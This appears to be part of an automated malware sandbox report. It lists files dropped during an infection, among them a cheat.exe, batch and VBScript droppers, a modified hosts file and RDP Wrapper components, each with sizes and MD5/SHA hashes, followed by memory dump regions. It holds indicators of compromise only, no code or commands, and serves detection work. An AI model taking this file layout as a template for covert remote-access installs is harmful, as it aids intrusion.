914a9f5347a82ebf3c153ed1121756985ac5e042

SHA256
353d32659a77c1827b845955bb65eae30e948e7a63b219526becf8f106f52e58

SHA512
f6f736193527189a7912b225b94be2c487c6c655ee9640e536ad8f5104888e38516018ae7f1eefcfe451d271c8da77e73887da4b0e32b7b7638148675a5652ee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

Filesize
400B

MD5
93055e333cf2a3ef2e80bc186174b23d

SHA1
ee07f3db8b73980eb10e2c8828296e554ed38dbb

SHA256
8165498137a47540d7ecb6bc83bca0a84334b4fc31bcf473b5aa546358a822ac

SHA512
d5878d750a4d3146ab231493bd1ba3ebe1c4ddcaf5a5b3c8d3a66808946516980c71fb2cee5be85b91cb04d5e9bee6a0a88eb251c1dc3b753390df9219701f9a

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
5KB

MD5
09e8a92edefe9d822ee11cb591300c7a

SHA1
2e205535a5882618e1d599520389c9cfd1d5287b

SHA256
463e3202093d465ed1af2b3fec570bdba3b765fe0c8d28d1ecf1d68d92402046

SHA512
42e35377936e0948eaec8e22b4e0d7aac44278f4475ace90211b00a8092046485bb976d3a3aeff9b824a13a8a3c3129702ebd4a133c9fbf8960004aba05ff1ee

Download Submit
C:\programdata\install\cheat.exe

Filesize
3.1MB

MD5
8ffd1c93d5233293e6e3e8d315a71547

SHA1
901f22542b3b28a0f3cff1356546ee3465f24df8

SHA256
db443480f2bbf928fe10dea4f8120bdcd2824aed6ffe2e50f90e3578e7910dc7

SHA512
576f7e9f6c9d5ea818352e17a98f2c964895c2315330ca36a4593dcdec543acfe444176f2a396dd375044bdddb951ee02f90fdfbfbd4bb0aef0f686f68825aaf

Download Submit
C:\programdata\microsoft\intel\R8.exe

Filesize
887KB

MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\programdata\microsoft\temp\H.bat

Filesize
5KB

MD5
76303bb3bb0faa707000df998d8c9f3d

SHA1
5b25444c92c7625e1ca77ed2eb1b4ba6877ba066

SHA256
a33af2b70ad8fea8900b6bd31ac7b0aab8a2b8b79e3e27adafbd34bdfcb67549

SHA512
25e34a1c1507d96e3a9a9722370ee98c85c900329ea74054783cd486a384f088bfe49e6662aa7eb3fc6db58a0178eb8a8851e13b608831bdd828830b8fdf981c

Download Submit
C:\rdp\RDPWInst.exe

Filesize
150KB

MD5
03fc292b3d5c7c332447f994aa06df37

SHA1
ad00e711ace830eada89f1d7d75b4766254c59ff

SHA256
0d814615352e9f254abbaf7b4ae1afc45dca3cc66a6a5b923d6510d33982d055

SHA512
85829604bede8c3c6374cb55636e200939865257c70117949d56ed5b29616a14570cb08584194de1fc3953a8789649c14642bb159644bb7d474d04eff144bd30

Download Submit
C:\rdp\RDPWInst.exe

Filesize
92KB

MD5
e477ef37a4536ab0f409d18ecf01d670

SHA1
69e63c61ddd60b848a3fbbd3d0257002dbd17e6d

SHA256
149942e778ba20af8b5d6eef7383e51e20814f7325801290ddf2506c704a367d

SHA512
daafd9596d8258c639b8139bb81452388e8b00515c5139fee80df801937eaf7bc5b8cdc1f83832f7a294c6685b7ae701139aa6794068da9249ff7c96477400b4

Download Submit
C:\rdp\RDPWInst.exe

Filesize
92KB

MD5
e477ef37a4536ab0f409d18ecf01d670

SHA1
69e63c61ddd60b848a3fbbd3d0257002dbd17e6d

SHA256
149942e778ba20af8b5d6eef7383e51e20814f7325801290ddf2506c704a367d

SHA512
daafd9596d8258c639b8139bb81452388e8b00515c5139fee80df801937eaf7bc5b8cdc1f83832f7a294c6685b7ae701139aa6794068da9249ff7c96477400b4

Download Submit
C:\rdp\Rar.exe

Filesize
370KB

MD5
2e86a9862257a0cf723ceef3868a1a12

SHA1
a4324281823f0800132bf13f5ad3860e6b5532c6

SHA256
2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

SHA512
3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

Download Submit
C:\rdp\Rar.exe

Filesize
370KB

MD5
2e86a9862257a0cf723ceef3868a1a12

SHA1
a4324281823f0800132bf13f5ad3860e6b5532c6

SHA256
2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

SHA512
3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

Download Submit
C:\rdp\bat.bat

Filesize
1KB

MD5
5835a14baab4ddde3da1a605b6d1837a

SHA1
94b73f97d5562816a4b4ad3041859c3cfcc326ea

SHA256
238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92

SHA512
d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

Download Submit
C:\rdp\db.rar

Filesize
411KB

MD5
ec61c1f3e78648fd8400e945d982abac

SHA1
87c405c595f5203b69de52aae289d36867a62f1c

SHA256
288aba11d61520345625e385b2b06ee40b4e33d83a3694120cdfdc7cf17dffa5

SHA512
8dfe68aabda1ee540ae89c255effede88c65e464a25fc9fa5c1e7bb86675bc07c885bf66016c1c4e3b13444e01a26becd4c37318b4f0471001a75a1f7b57e80f

Download Submit
C:\rdp\install.vbs

Filesize
80B

MD5
6d12ca172cdff9bcf34bab327dd2ab0d

SHA1
d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493

SHA256
f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec

SHA512
b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

Download Submit
C:\rdp\pause.bat

Filesize
352B

MD5
a47b870196f7f1864ef7aa5779c54042

SHA1
dcb71b3e543cbd130a9ec47d4f847899d929b3d2

SHA256
46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba

SHA512
b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

Download Submit
C:\rdp\run.vbs

Filesize
84B

MD5
6a5f5a48072a1adae96d2bd88848dcff

SHA1
b381fa864db6c521cbf1133a68acf1db4baa7005

SHA256
c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe

SHA512
d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
92KB

MD5
fefbca5e074bd8c83c7aa212e49e082b

SHA1
33e78450274da348c6ecc8b51152b62a92eef146

SHA256
b606a20b4564dbb8031722decbece836b811e99d97c9babbcd15166883496b9b

SHA512
b593268912de7786e20907ab0e793efaced19d77e98e00979b26826c2132d2e1a74de070c9aca9612cddba43294184e3a76b27c20a24839875321546d32c9fbc

Download Submit
memory/116-159-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/116-157-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/116-161-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/116-163-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/116-160-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/116-158-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/944-185-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/944-180-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/944-178-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/944-187-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/944-182-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1720-205-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1720-209-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1720-264-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1720-207-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1720-203-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1720-201-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4140-173-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4140-170-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4140-200-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4140-171-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4140-175-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4140-174-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4412-154-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4412-152-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4412-153-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4412-151-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4412-150-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4412-149-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4572-231-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4572-229-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4572-228-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4572-230-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4572-233-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4572-232-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4900-202-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4900-204-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4900-206-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4900-210-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/4900-208-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download